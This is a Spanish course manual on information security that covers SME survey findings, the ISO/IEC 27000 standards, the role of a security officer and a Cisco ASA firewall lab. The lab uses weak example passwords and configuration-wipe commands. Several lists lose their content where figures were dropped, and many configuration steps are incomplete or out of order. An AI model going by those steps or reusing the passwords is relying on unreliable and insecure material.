Según un importante estudio realizado por INTECO (Instituto Nacional de
Tecnologías de la Comunicación) y el Ministerio de Industria, Energía y Turismo

del Gobierno de España, denominado: “Estudio sobre seguridad de la

información y continuidad de negocio en las pymes españolas“, que puede ser
ubicado en la dirección: https://www.incibe.es/file/Sp61c9ljOlMT7jcjbxYNVQ
podemos resumir lo siguiente:
El universo de este estudio se compone de las pymes españolas con al menos
un ordenador conectado a Internet, estratificado en base al número de
empleados y sector de actividad.
La PYME, en España aglutina a gran parte del sector empresarial (99%),
contribuyendo en gran medida a la generación de riqueza económica.
En este estudio se denomina PYME a profesionales liberales y empresas de
hasta 250 trabajadores, en base a la clasificación establecida por la Comunidad
Europea.
A partir de este estudio podemos encontrar los siguientes indicadores:
 Las pymes participantes muestran un notable uso de las TIC. El ordenador

de sobremesa es la herramienta más imprescindible por el momento:
 Ante los problemas de seguridad, las empresas han implementado

algunas acciones entre las cuales se pueden citar:

 Con respecto a las comunicaciones móviles, se han aplicado diversos

procedimientos para permitir un mayor nivel de seguridad, siendo las
más importantes:
 En las empresas se debería asignar a una o un grupo de personas para

que se encarguen de velar por la seguridad de la información, ya que es
muy importante que se cumplan con los procedimientos que ayuden a
mantener un óptimo nivel de seguridad.

Según lo indicado anteriormente, el estudio muestra la siguiente

información:
 Con respecto a las buenas prácticas en las empresas para contribuir con
la seguridad de la información, se pueden rescatar las siguientes
procedimientos:
o Copias de seguridad, siendo el lugar donde se guardan
comúnmente estas copias, en soporte físico (CDs, DVDs, etc.) en
la propia empresa.
o Actualización de programas y sistemas, siendo la actualización
automática la más utilizada.
o Medidas de control de acceso a equipos y documentos, utilizando
acceso por contraseñas y mediante otros sistemas (DNI
electrónico, tarjeta inteligentes, biometría, etc.).
o Buenas prácticas en dispositivos móviles.
o Buenas prácticas para los empleados, de tal forma que el acceso
a ciertos contenidos está limitado con una herramienta de filtrado,
está prohibido el uso de Internet para uso personal (redes sociales,
correo personal, prensa, etc.).
 La mayoría de las empresas no cuentan con planes y políticas de
seguridad, siendo el resultado del estudio con respecto a ese punto, el
siguiente:

 Existen pocas empresas que cuentan con la certificación 27001:
 La Gestión de la Continuidad de Negocio abarca una serie de actividades:

o Fase I – Diseño del Plan y establecimiento de la Política de
Continuidad de Negocio.
o Fase II – Conocimiento de los procesos de negocio de la
organización y análisis de riesgos.

o Fase III – Medidas preventivas.

o Fase IV – Estrategia de recuperación.
o Fase V – Desarrollo e implantación del Plan.
o Fase VI – Mantenimiento del Plan.
Lamentablemente, la mayoría de las empresas no gestiona la continuidad
del Negocio en caso de problemas graves, siendo los indicadores:
 Las razones por las cuales las empresas no han contemplado previsiones
en caso de situaciones que afecten al negocio son diversas, siendo las
más comunes:

Ejercicios y tareas de investigación
1. Visualice los siguientes videos sobre la seguridad informática:
https://www.youtube.com/watch?v=KiuTyXehW-8
https://www.youtube.com/watch?v=lbHg84vi4uM
https://www.youtube.com/watch?v=zV2sfyvfqik
Realice un resumen y conclusiones de lo observado y escuchado.
2. ¿Qué es un exploit y cómo funciona?.

3. ¿Qué ventajas tiene el implementar un SGSI en una empresa?.
4. ¿Qué tipos de ataques informáticos conoces?


02
Tarea 02: Entender las Normas y estándares internacionales sobre la
seguridad de la información.
En esta tarea realizará las siguientes Operaciones:
Entender la importancia de la aplicación de la familia de normas ISO/IEC

27000.
Entender los Roles del Oficial de seguridad.
“La grandeza radica no en ser fuerte sino en el correcto uso

de la fuerza”
Henry Ward Beecher
 Computadora con microprocesadores core 2 Duo ó de mayor capacidad.

siguientes:
o Servidor Microsoft (Windows 2003 o Windows 2008)
 Software de simulación de redes.
 Software de captura de paquetes.
 Realizar políticas de seguridad con respecto al uso de dispositivos

extraíbles, unidades de disco y dispositivos móviles.
TAREAS PRÁCTICAS:
El alumno detectará los diversos problemas que se presentan en la empresa
donde se encuentra realizando la complementación de sus estudios prácticos en
el ámbito de la seguridad.
Como puede ayudar a esta empresa la implementación del ISO 27001 y un SGSI
en los siguientes ámbitos:
 Ordenamiento del negocio.
 Competitividad.
 Menores gastos.
 Cumplimiento de otras normas.
 Sensibilización del personal en torno a la seguridad informática.
 Creación de registros y bancos de datos seguros.
 Credibilidad y confianza en terceros agentes como proveedores.
 Disminución de incidentes informáticos.
 Otros.
Debe detallar cada uno de los beneficios en cada ámbito.
Además, indique, como podría ayudar la contratación de un Oficial de seguridad
de la información.

FUNDAMENTO TEORICO
Operación:
Entender la importancia de la aplicación de la familia de normas ISO/IEC
27000.
La Familia ISO 27000:2014 está conformado por las siguientes normas:
ISO/IEC 27000:
Esta norma fue publicada el 1 de Mayo de 2009, luego fue revisada el 01 de
Diciembre de 2012 y se implementó una tercera edición el 14 de Enero de 2014.
Esta norma brinda una visión general de las normas que componen la serie
27000, indicando para cada una de ellas su ámbito y el objetivo de su
publicación. Nos ayuda a entender el por qué de la implantación de un SGSI, así
como su establecimiento, monitorización, mantenimiento y mejora.
ISO/IEC 27001:
Esta norma fue publicada el 15 de Octubre de 2005 y revisada el 25 de
Septiembre de 2013. Esta norma es la más importante de la familia ISO 27000
e incluye los requisitos del sistema de gestión de seguridad de la información.
Es la norma que se utiliza para certificar a los auditores externos de los SGSIs
de las organizaciones.
ISO/IEC 27002:
Esta norma fue publicada el 1 de Julio de 2007. Es una guía de buenas prácticas
que describe los objetivos de control y controles recomendables en cuanto a
seguridad de la información. Esta norma no es certificable. Contiene 39 objetivos
de control y 133 controles, agrupados en 11 dominios.
Actualmente, la última edición de 2013 tiene un total de 14 Dominios, 35
Objetivos de Control y 114 Controles.
ISO/IEC 27003:
Esta norma fue publicada el 01 de Febrero de 2010, esta norma no es
certificable. Es utilizada como guía
en los aspectos críticos para el
óptimo diseño e implementación de
un SGSI tomando en cuenta el ISO
27001.
ISO/IEC 27004:
La publicación de esta norma fue el
15 de Diciembre de 2009. Esta norma
no es certificable. Es una guía para el

uso de métricas y técnicas para determinar la eficacia de un SGSI y de los

controles implementados según ISO/IEC 27001.
ISO/IEC 27005:
La publicación de esta norma fue el 15 de Junio de 2008 y la segunda edición el
1 de Junio de 2011. Es una norma no certificable. Proporciona algunas
directrices para la gestión del riesgo en la seguridad de la información.
ISO/IEC 27006:
Esta norma fue publicada del 1 de Marzo de 2007 y tuvo una segunda edición el
1 de Diciembre de 2011. Esta norma indica los requisitos para la acreditación de
entidades de auditoría y certificación de sistemas de gestión de seguridad de la
información.
ISO/IEC 27007:
Esta norma fue publicada el 14 de Noviembre de 2011. Es una norma no
certificable. Es una guía para realizar la auditoría de un SGSI y puede utilizarse
como un complemento de la norma ISO 19011.
ISO/IEC TR 27008:
Esta norma fue publicada el 15 de Octubre de 2011. Es una norma no
certificable. Es utilizada como una guía de auditoría de los controles
seleccionados en el marco de implantación de un SGSI.
ISO/IEC 27009:
Se encuentra en proceso de desarrollo. Es una norma no certificable. Es una
guía sobre el uso y aplicación de los principios de ISO/IEC 27001 tomando en
cuenta el sector de servicios específicos.
ISO/IEC 27010:
Esta norma fue publicada el 20 de Octubre de 2012. Consiste en una guía para
la gestión de la seguridad de la información cuando se comparte entre
organizaciones o sectores. Esta norma es aplicable a todas las formas de
intercambio y difusión de información sensible, tanto en organizaciones públicas
como privadas, a nivel nacional e internacional.
ISO/IEC 27011:
Esta norma fue publicada el 15 de Diciembre de 2008. Es una guía de
interpretación de la implementación y gestión de la seguridad de la información
en organizaciones del sector de telecomunicaciones basada en la norma
ISO/IEC 27002:2005.
ISO/IEC 27013:

Esta norma fue publicada el 15 de Octubre de 2012. Es una guía de

implementación integrada de ISO/IEC 27001:2005 (gestión de seguridad de la
información) y de ISO/IEC 20000-1 (gestión de servicios TI).
ISO/IEC 27014:
Esta norma fue publicada el 23 de Abril de 2013. Es una guía de gobierno
corporativo de la seguridad de la información.
ISO/IEC TR 27015:
Esta norma fue publicada el 23 de Noviembre de 2012. Es una guía de SGSI
orientada a organizaciones del sector financiero y de seguros.
ISO/IEC TR 27016:
Esta norma fue publicada el 20 de Febrero de 2014. Es una guía de valoración
de los aspectos financieros de la seguridad de la información aplicada en las
organizaciones.
ISO/IEC TS 27017:
Se espera que su publicación se realice próximamente. Consistirá en una guía
de seguridad para el nuevo servicio Cloud Computing.
ISO/IEC 27018:
Se publicó el 29 de Julio de 2014. Es un conjunto de buenas prácticas en
protección de datos para servicios de computación en cloud computing.
ISO/IEC TR 27019:
Esta norma fue publicada el 17 de Julio de 2013. Es una guía que hace
referencia a la norma ISO/IEC 27002:2005 para el proceso de sistemas de
control específicos relacionados con el sector de la industria de la energía.
ISO/IEC 27031:
Norma publicada el 01 de Marzo de 2011. No es una norma certificable. Es una
guía de apoyo para la adecuación de las TICs de una organización para lograr
la continuidad del negocio.
ISO/IEC 27032:
Esta norma fue publicada el 16 de Julio de 2012. Facilita orientación para la
mejora del nivel de seguridad cibernética, mostrando los aspectos únicos de esa
actividad y de sus dependencias en otros ámbitos de seguridad, concretamente:
Información de seguridad, seguridad de las redes, seguridad en Internet e
información de protección de infraestructuras críticas.
ISO/IEC 27033:

Aún se encuentra en desarrollo. Esta norma está dedicada a la seguridad en

redes, consistente en 7 partes: 27033-1, conceptos generales; 27033-2,
directrices de diseño e implementación de seguridad en redes; 27033-3,
escenarios de referencia de redes; 27033-4, aseguramiento de las
comunicaciones entre redes mediante gateways de seguridad; 27033-5,
aseguramiento de comunicaciones mediante VPNs; 27033-6, convergencia IP;
27033-7, redes inalámbricas.
ISO/IEC 27034:
Se encuentra en proceso. Esta norma está dedicada a la seguridad en
aplicaciones informáticas, consistente en 6 partes: 27034-1, conceptos
generales; 27034-2, marco normativo de la organización; 27034-3, proceso de
gestión de seguridad en aplicaciones; 27034-4, validación de la seguridad en
aplicaciones; 27034-5, estructura de datos y protocolos y controles de seguridad
de aplicaciones; 27034-6, guía de seguridad para aplicaciones de uso específico.
ISO/IEC 27035:
Esta norma ha sido publicada el 17 de Agosto de 2011. Facilita una guía sobre
la gestión de incidentes de seguridad en la información.
ISO/IEC 27036:
Guía de seguridad en relación con los proveedores: 27036-1, visión general y
conceptos; 27036-2, requisitos comunes; 27036-3, seguridad en la cadena de
suministro TIC; 27036-4, seguridad en entornos de servicios Cloud.
ISO/IEC 27037:
Esta norma es publicada el 15 de Octubre de 2012. Es una guía que proporciona
reglas para las actividades relacionadas con la identificación, recopilación,
consolidación y preservación de evidencias digitales en teléfonos móviles,
tarjetas de memoria, dispositivos electrónicos personales, sistemas de
navegación móvil, cámaras digitales y de video, redes TCP/IP, entre otros
dispositivos.
ISO/IEC 27038:
Esta norma fue publicada el 13 de Marzo de 2014. Es una guía relacionada con
la seguridad en la redacción digital.
ISO/IEC 27039:
Esta norma fue publicada el 11 de Febrero de 2015. Es una guía para la
selección, despliegue y operación de sistemas de detección y prevención de
intrusos.
ISO/IEC 27040:

Esta norma fue publicada el 05 de Enero de 2015. Es una guía para la seguridad
en medios de almacenamiento de datos digitales.
ISO/IEC 27041:
Esta norma fue publicada el 19 de Junio de 2015. Es una guía para la garantizar
la disposición y ajuste de los métodos de investigación que tiene que ver en
temas de seguridad informática.
ISO/IEC 27042:
Esta norma fue publicada el 19 de Junio de 2015. Es una guía con reglas para
el análisis e interpretación de las evidencias digitales.
ISO/IEC 27043:
Esta norma fue publicada el 04 de Marzo de 2015. Desarrolla los principios y
procesos de investigación para una óptima recopilación de evidencias digitales.
ISO 27799:
Esta norma fue publicada el 01 de Julio de 2012. Es una norma que proporciona
directrices para apoyar la aplicación de un óptimo nivel de seguridad de
información en el sector sanitario, sobre los datos de salud de los pacientes.
La norma ISO 27001:2014 es de gran importancia en el ámbito empresarial e

institucional, por ello, el 8 de enero de 2016, se emitió la RESOLUCIÓN
MINISTERIAL Nº 004-2016-PCM.

Esta resolución indica en su primer artículo, lo siguiente:

“Apruébese el uso obligatorio de la Norma Técnica Peruana “NTP ISO/IEC
27001:2014 Tecnología de la Información. Técnicas de Seguridad. Sistemas de
Gestión de Seguridad de la Información. Requisitos. 2ª Edición”, en todas las
entidades integrantes del Sistema Nacional de Informática”.
Además se indica que las diversas entidades integrantes del Sistema Nacional
de Informática, tendrán un plazo máximo de dos años para la implementación
y/o adecuación de la presente norma.
Según lo indicado, se puede notar que el estado peruano está interesado en
lograr un alto nivel de seguridad de la información en las entidades integrantes
del Sistema Nacional de Informática.
El Sistema Nacional de Informática fue creado por Decreto Legislativo N° 604,
y tiene como fin el organizar las actividades y proyectos que en materia de
informática realizan las instituciones públicas del Estado, así como su relación
con otros sistemas y áreas de la Administración Pública.
Los miembros que conforman el Sistema Nacional de Informática son:
1. El Consejo Consultivo Nacional de Informática (CCONI).
2. El Comité de Coordinación Interinstitucional de Informática (CCOI).
3. Las Oficinas Sectoriales de Informática y demás Oficinas de Informática
de los Ministerios, de los Organismos Centrales, Instituciones Públicas
Descentralizadas y Empresas del Estado.
4. Las Oficinas Sectoriales de Informática y demás Oficinas de Informática
de los Ministerios, de los Organismos Centrales, Instituciones Públicas
Descentralizadas y Empresas del Estado.
5. Los Órganos de Informática de las Municipalidades.
6. Los Órganos de Informática de los Poderes Públicos y de los Organismos
Autónomos.
Si desea mayor información al respecto, puede acceder a las direcciones
electrónicas:
http://www.ongei.gob.pe/normas/0/NORMA_0_RESOLUCI%C3%93N_MINIST
ERIAL_N%C2%B0_004_2016_PCM.pdf.
http://www.ongei.gob.pe/quienes/ongei_quienes.asp?pk_id_entidad=1878&opci
ones=S
Detallando un poco más, en el ISO 27001 se pueden distinguir importantes
clausulas, de las cuales realizaré un breve resumen:

1. Cláusula 4. Contexto de la
organización:
Esta cláusula se centra en identificar a

los clientes o beneficiarios del SGSI
(Sistema de gestión de la seguridad de
la información). Para lograr esto, está
formado a su vez por las siguientes
subcláusulas:
1. Entender la organización y su
contexto.
2. Entender las necesidades y
expectativas de las partes
interesadas.
3. Determinar el alcance del SGSI.
2. Cláusula 5. Liderazgo:
Aquí se indican los requisitos necesarios para garantizar la puesta en

marcha del SGSI y establece las directrices de gestión de alto nivel que
deben motivar el funcionamiento del sistema en la empresa.
A su vez, esta cláusula está formada por las siguientes subcláusulas:
1. Liderazgo y compromiso.
2. Política de seguridad.
3. Roles de la organización, responsabilidades y autoridad.
3. Cláusula 6. Planificación:
Esta cláusula muestra la secuencia de pasos para la creación del SGSI

en donde resaltan las tareas de toma de decisiones, proceso de
identificación y análisis del riesgo.
A su vez, esta cláusula está formada por las siguientes subcláusulas:
1. Acciones para dirigir los riesgos y oportunidades.

2. Objetivos y planes.
4. Cláusula 7. Soporte

Esta cláusula establece qué medios serán necesarios cuando se

encuentre en marcha el SGSI. Permite identificar las necesidades
materiales pero también la importancia de las personas y de sus
capacidades técnicas.
A su vez, esta cláusula se subdivide en:
1. Recursos.
2. Competencias.
3. Concienciación.
4. Comunicación.
5. Documentación.
5. Cláusula 8. Operación.
Esta cláusula indica el cómo se garantizará el funcionamiento del SGSI

una vez que ha completado su fase de construcción.
1. Planificación operativa y control.

2. Análisis del riesgo.
3. Tratamiento del riesgo.
6. Cláusula 9. Evaluación del rendimiento:
Esta cláusula es muy importante, sobre todo para la gestión que se

encarga de la búsqueda de resultados.
1. Monitorización, medición, análisis y evaluación.

2. Auditoría interna.
3. Revisión por Dirección.
7. Cláusula 10. Mejoras:
Permite el ajuste o el control de desviaciones del SGSI donde las cosas

que no funcionan son documentadas para que sean corregidas y así
anular las consecuencias directas como las causas que las ocasionan con
el objetivo de lograr un óptimo desarrollo del SGSI.

1. No conformidad y acción correctiva.

2. Mejora continua.
Operación:
Entender los Roles del Oficial de seguridad
Informática.
En las diferentes instituciones se requiere de una
persona encargada de coordinar, planear y
promover las actividades que tengan que ver con el
tema de la seguridad informática, esta persona
debe encargarse de evitar las intrusiones, robo de
información, problemas de virus, entre otros
incidentes; además, no existe una legislación informática adecuada donde se
tipifiquen correctamente los delitos informáticos.
El propósito de tener un especialista como Oficial de Seguridad Informática (OSI)
es tener a alguien al cual se pueda acudir en caso de presentarse algún
problema de seguridad, este especialista también debe estar encargado de
difundir las alertas, definir procedimientos que reduzcan los incidentes de
seguridad.
El Oficial de seguridad informática, es el responsable de planear, coordinar y
administrar los diversos procesos de seguridad informática en una organización
con el fin de mantener la información protegida ante cualquier problema que
pueda presentarse.
Este especialista en seguridad debe difundir la cultura de seguridad informática
entre todos los miembros de la organización a fin de que se cumpla la política de
seguridad implementada.
Entre los objetivos que debe cumplir un Oficial de seguridad se tienen:
1. Definir la misión de la empresa con referencia a la seguridad informática
de la organización en conjunto con las autoridades de la misma.
2. Aplicar una adecuada metodología de análisis de riesgos para evaluar el
nivel de seguridad informática con la que cuenta la organización.
3. Definir la Política de seguridad de la información en la organización.
4. Definir los procedimientos a seguir para aplicar de forma óptima la Política
de seguridad informática implementada en la empresa.
5. Promover la aplicación de auditorías tanto internas como externas para
evaluar el correcto desarrollo de las prácticas de seguridad informática
dentro de la organización.

Los deberes y responsabilidades del OSI deben

establecerse claramente y requieren ser aprobados
por la administración y/o directivos de las
organizaciones.
Entre los deberes y responsabilidades más
comunes que debe cumplir un OSI, tenemos:
1. El OSI debe realizar las coordinaciones
diarias del proceso de Seguridad Informática de la institución donde se
encuentra laborando.
2. Tiene como responsabilidad asegurar el correcto funcionamiento del
proceso de Seguridad Informática de la institución. Debe ser capaz de
guiar y aconsejar a los usuarios de la institución sobre cómo desarrollar
procedimientos para la protección de los recursos.
3. Una de las tareas más importantes para el OSI es guiar ante cualquier
Incidente, con el fin de atender rápidamente este tipo de eventualidades.
4. El OSI es responsable de proponer y coordinar la realización de un
análisis de riesgos formal en seguridad de la información que abarque
toda la organización, ya que todos deben estar conscientes de la
importancia de la seguridad de la información.
5. Es responsabilidad del OSI promover la creación y actualización de las
políticas de seguridad informática.
6. Es responsabilidad del OSI el desarrollo de un Plan de Seguridad de la
Información en la organización.
7. El OSI debe atender y responder inmediatamente las notificaciones de
sospecha de un incidente de seguridad o de incidentes reales.
8. El OSI debe crear una base de datos para el registro de incidentes en la
red, la cual debe poder ser accedida por los miembros del grupo de
seguridad.
9. Es responsabilidad del OSI coordinar la realización periódica de
auditorías.
10. El OSI debe establecer la misión y metas internas en cuanto a la
seguridad de la información, de acuerdo a la misión y metas
organizacionales.

11. El OSI debe administrar el presupuesto de

seguridad informática.
12. El OSI debe definir la estrategia de seguridad
informática (hacia dónde hay que ir y qué hay
que hacer) y definir los objetivos.
13. El OSI debe detectar las necesidades y
vulnerabilidades de seguridad desde el punto
de vista del negocio y su solución.
1. ¿Cuáles son las ventajas de contar con normas y estándares internacionales

en el ámbito de seguridad de la información como el ISO 27000?
2. ¿Cuáles son las clausulas indicadas en la norma ISO 27001?
3. ¿Cuáles son los roles del oficial de seguridad informática en la empresa?.
4. ¿Cuál es la importancia de contar con auditorias en seguridad de la
información en la empresa?.


03
Tarea 03: Reconocer los diferentes tipos de firewall para las empresas.
En esta tarea realizará las siguientes Operaciones: 4

Entender la importancia de los diferentes tipos de firewall para redes
empresariales.
Comprender el funcionamiento de los firewall por hardware.
Comprender el funcionamiento de los firewall por software.
“El éxito va acompañado de la fe que tengas para lograrlo.”
Anónimo.
 Computadora con microprocesadores core 2 Duo ó de mayor

capacidad.
 Sistema operativo Windows 7.
 Navegadores instalados: Internet explorer, Chrome y Firefox.
 Entender la importancia de los diferentes tipos de firewall para redes

empresariales.
TAREA PRÁCTICA
Importancia de los diferentes tipos de firewall para redes empresariales.
El ejercicio práctico consistirá en realizar la configuración de un Cisco ASA para
proteger una red (la configuración se puede realizar utilizando un simulador como
Packet Tracert o un emulador como GNS3).
La topología es la siguiente:
Realizaremos la configuración según la siguiente tabla:
Default Switch
Device Interface IP Address Subnet Mask Gateway Port
Fa0/0 209.165.200.225 255.255.255.248 N/A ASAEt0/0

R1
Se2/0 (DCE) 10.1.1.1 255.255.255.252 N/A N/A
Se2/0 10.1.1.2 255.255.255.252 N/A N/A

R2
S3/0 (DCE) 10.2.2.2 255.255.255.252 N/A N/A
Fa0/0 172.16.3.1 255.255.255.0 N/A S3 F0/1

R3
Se2/0 10.2.2.1 255.255.255.252 N/A N/A
ASA VLAN 1 (Et0/1) 192.168.1.1 255.255.255.0 NA S2 F0/1

(Inside)
ASA VLAN 2 (Et0/0) 209.165.200.226 255.255.255.248 NA R1 Fa0/0

(Outside)
ASA VLAN 3 (Et0/2) 192.168.2.1 255.255.255.0 NA S1 Fa0/1

(DMZ)
DMZ NIC 192.168.2.3 255.255.255.0 192.168.2.1 S1 Fa1/1

Server
PC1 NIC 192.168.1.3 255.255.255.0 192.168.1.1 S2 Fa1/1

PC0 NIC 172.16.3.3 255.255.255.0 172.16.3.1 S3 Fa1/1

Realizaremos el siguiente procedimiento:
Configuracion en el router R1:
Router>
Router>
Router>enable
Router#confi
Configuring from terminal, memory, or network [terminal]?
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#hostname R1
R1(config)#interface fa0/0
R1(config-if)#ip address 209.165.200.225 255.255.255.248
R1(config-if)#no shut
R1(config-if)#
%LINK-5-CHANGED: Interface FastEthernet0/0, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/0,

changed state to up
R1(config-if)#exit
R1(config)#int se2/0
%LINK-5-CHANGED: Interface Serial2/0, changed state to down

R1(config-if)#
R1(config-if)#clock rate 64000
R1(config-if)#
En el router R2:
Router>
Router>en
Router#
Router#conf

R2(config-if)#
%LINK-5-CHANGED: Interface Serial2/0, changed state to up
R2(config-if)#exit
R2(config)#int
%LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/0, changed state
to up
se3/0
R2(config-if)#exit
R2(config-if)#
R2(config-if)#clock rate 64000
%LINK-5-CHANGED: Interface Serial3/0, changed state to down

R2(config-if)#
R2(config-if)#
Configuracion en el router R3:

Router>
Router>en
Router#
Router#config
R3(config)#int fa0/0
R3(config-if)#
%LINK-5-CHANGED: Interface FastEthernet0/0, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/0,

changed state to up

R3(config-if)#exit
R3(config-if)#
%LINK-5-CHANGED: Interface Serial2/0, changed state to up
R3(config-if)#
%LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/0, changed state
to up
Configurar una ruta estática por defecto de R1 a R2 y de R3 a R2:
R1#conf
R1(config)#ip route 0.0.0.0 0.0.0.0 se2/0
R1(config)#
R3>
R3>en
R3#
R3#conf
R3(config)#
Configurar una ruta estática de R2 a la R1 (conectado a la interfaz ASA ) y

una ruta estática de R2 a la LAN R3.
R2>
R2>en
R2#
R2#conf

R2(config)#
En R1, configurar la consola de línea 0 y Telnet para utilizar la base de

datos de usuarios locales para los inicios de sesión. Para mayor seguridad,
el comando exec-timeout hace que la sesión se cierre después de cinco
minutos de inactividad.
R1(config)#username admin01 secret eti2016

R1(config)#line console 0
R1(config-line)#login local
R1(config-line)#exec-timeout 5 0
R1(config-line)#logging synchronous
R1(config-line)#exit
R1(config)#line vty 0 4
R1(config-line)#login local
R1(config-line)#exec-timeout 5 0
R1(config-line)#
Configurar los equipos con los IP adecuados, según la tabla:
DMZ Server:
PC1:

PC0:
Iniciará la configuracion del ASA de Cisco:
ciscoasa>
ciscoasa>enable
Password:
Invalid password
Password:
ciscoasa#show version
Determinar el sistema de archivos y contenido de la memoria flash:
ciscoasa#show file system

Puede restaurar el ASA a su configuración predeterminada de fábrica

utilizando el comando de configuración predeterminada de fábrica.
ciscoasa#conf t
ciscoasa(config)#configure factory-default
Utilice el comando de borrado de escritura para eliminar el archivo de

configuración de inicio de la memoria flash y reinicie:
ciscoasa#
ciscoasa#write erase
Erase configuration in flash memory? [confirm]
[OK]
ciscoasa#reload
Proceed with reload? [confirm]
Se reiniciará:
***
*** --- START GRACEFUL SHUTDOWN ---
Shutting down isakmp
Shutting down webvpn
Shutting down File system
***
*** --- SHUTDOWN NOW ---
Process shutdown finished
Rebooting.....
CISCO SYSTEMS
Embedded BIOS Version 1.0(12)13 08/28/08 15:50:37.45
Low Memory: 632 KB

High Memory: 507 MB
PCI Device Table.
Bus Dev Func VendID DevID Class Irq
00 01 00 1022 2080 Host Bridge
00 01 02 1022 2082 Chipset En/Decrypt 11
00 0C 00 1148 4320 Ethernet 11

00 0D 00 177D 0003 Network En/Decrypt 10

00 0F 00 1022 2090 ISA Bridge
00 0F 02 1022 2092 IDE Controller
00 0F 03 1022 2093 Audio 10
00 0F 04 1022 2094 Serial Bus 9
00 0F 05 1022 2095 Serial Bus 9
Evaluating BIOS Options ...

Launch BIOS Extension to setup ROMMON
Cisco Systems ROMMON Version (1.0(12)13) #0: Thu Aug 28 15:55:27 PDT
2008
Platform ASA5505
Use BREAK or ESC to interrupt boot.

Use SPACE to begin boot immediately.
Boot in 9 seconds
Boot in 8 seconds
Boot in 7 seconds
Boot in 6 seconds
Boot in 5 seconds
Boot in 4 seconds
Boot in 3 seconds
Boot in 2 seconds
Boot in 1 second
Launching BootLoader...
Default configuration file contains 1 entry.
Searching / for images to boot.
Loading /asa842-k8.bin... Booting...

Platform ASA5505
Loading...
IO memory blocks requested from bigphys 32bit: 9672
dosfsck 2.11, 12 Mar 2005, FAT32, LFN
Starting check/repair pass.

Starting verification pass.

/dev/hda1: 152 files, 35584/62780 clusters
dosfsck(/dev/hda1) returned 0
Processor memory 348127232, Reserved memory: 62914560
Total SSMs found: 0
Total NICs found: 10

88E6095 rev 2 Gigabit Ethernet @ index 09 MAC: 0000.0003.0002
88E6095 rev 2 Ethernet @ index 08 MAC: 000A.F354.3008
y88acs06 rev16 Gigabit Ethernet @ index 00 MAC: 44d3.caef.1e22
Encryption hardware device : Cisco ASA-5505 on-board accelerator (revision
0x0)
Boot microcode : CN1000-MC-BOOT-2.00
SSL/IKE microcode : CNLite-MC-SSLm-PLUS-2.03
IPSec microcode : CNlite-MC-IPSECm-MAIN-2.06
Verify the activation-key, it might take a while...
Running Permanent Activation Key: 0xK5R42O9A 0xSY4GKFL1 0xPC1B4GIK
0xZ9NYE0K9 0x529M7G25
Licensed features for this platform:

Maximum Physical Interfaces :8 perpetual
VLANs :3 DMZ Restricted
Dual ISPs : Disabled perpetual
VLAN Trunk Ports :0 perpetual
Inside Hosts : 10 perpetual
Failover : Disabled perpetual
VPN-DES : Enabled perpetual
VPN-3DES-AES : Enabled perpetual
AnyConnect Premium Peers :2 perpetual
AnyConnect Essentials : Disabled perpetual
Other VPN Peers : 10 perpetual
Total VPN Peers : 25 perpetual

Shared License : Disabled perpetual

AnyConnect for Mobile : Disabled perpetual
AnyConnect for Cisco VPN Phone : Disabled perpetual
Advanced Endpoint Assessment : Disabled perpetual
UC Phone Proxy Sessions :2 perpetual
Total UC Proxy Sessions :2 perpetual
Botnet Traffic Filter : Disabled perpetual
Intercompany Media Engine : Disabled perpetual
This platform has a Base license.

Cisco Adaptive Security Appliance Software Version 8.4(2)
****************************** Warning *******************************

This product contains cryptographic features and is
subject to United States and local country laws
governing, import, export, transfer, and use.
Delivery of Cisco cryptographic products does not
imply third-party authority to import, export,
distribute, or use encryption. Importers, exporters,
distributors and users are responsible for compliance
with U.S. and local country laws. By using this
product you agree to comply with applicable laws and
regulations. If you are unable to comply with U.S.
and local laws, return the enclosed items immediately.
A summary of U.S. laws governing Cisco cryptographic

products may be found at:
http://www.cisco.com/wwl/export/crypto/tool/stqrg.html
If you require further assistance please contact us by

sending email to export@cisco.com.
******************************* Warning *******************************
Copyright (c) 1996-2011 by Cisco Systems, Inc.
Restricted Rights Legend
Use, duplication, or disclosure by the Government is

subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software - Restricted

Rights clause at FAR sec. 52.227-19 and subparagraph

(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.
Cisco Systems, Inc.

170 West Tasman Drive
San Jose, California 95134-1706
Reading from flash...

!
Flash read failed
ERROR: MIGRATION - Could not get the startup configuration.
Configuration has non-ASCII characters and will be ignored.
Cryptochecksum (changed): d41d8cd9 8f00b204 e9800998 ecf8427e
INFO: MIGRATION - Saving the startup errors to file

'flash:upgrade_startup_errors_201310031651.log'
Pre-configure Firewall now through interactive prompts [yes]:
Luego del reinicio, podremos ver un asistente para las configuraciones básicas:
Firewall Mode [Routed]:
Enable password [<use current password>]:senati
Allow password recovery [yes]?
Clock (UTC):
Year [1993]: 2016
Month [mar.]:
Day [1]: 20
Time [00:03:00]: 10:00:00
Management IP address:192.168.1.1
Management network mask:255.255.255.0
Host name:ASA
Domain name:senati.edu.pe
IP address of host running Device Manager:
The following configuration will be used:

Enable password: senati
Allow password recovery: yes

Clock (UTC): 10:00:00 mar. 20 2016

Firewall Mode: Routed
Management IP address: 192.168.1.1
Management network mask: 255.255.255.0
Host name: asa
Domain name: senati.edu.pe
Use this configuration and write to flash?

Configuración de los parámetros ASA y seguridad de interfaz CLI
asa#config t
asa(config)#hostname ASA-SENATI
ASA-SENATI(config)#domain-name senati.edu.pe
ASA-SENATI(config)#passwd cisco
ASA-SENATI(config)#enable password class
ASA-SENATI(config)#clock set 10:00:00 april 04 2016
ASA-SENATI(config)#
Configurar las interfaces interna y externa:
ASA-SENATI(config)#interface vlan 1
ASA-SENATI(config-if)#nameif inside
ASA-SENATI(config-if)#ip address 192.168.1.1 255.255.255.0
ASA-SENATI(config-if)#security-level 100
ASA-SENATI(config-if)#no shut
ASA-SENATI(config-if)#interface vlan 2
ASA-SENATI(config-if)#nameif outside
ASA-SENATI(config-if)#
ASA-SENATI(config-if)#exit
ASA-SENATI(config)#int et0/1
ASA-SENATI(config-if)#switchport access vlan 1
ASA-SENATI(config-if)#no shutdown
ASA-SENATI(config-if)#int et0/0

ASA-SENATI(config-if)#exit
ASA-SENATI#show interface ip brief
ASA-SENATI#show switch vlan
Configurar una ruta estática por defecto para la ASA:
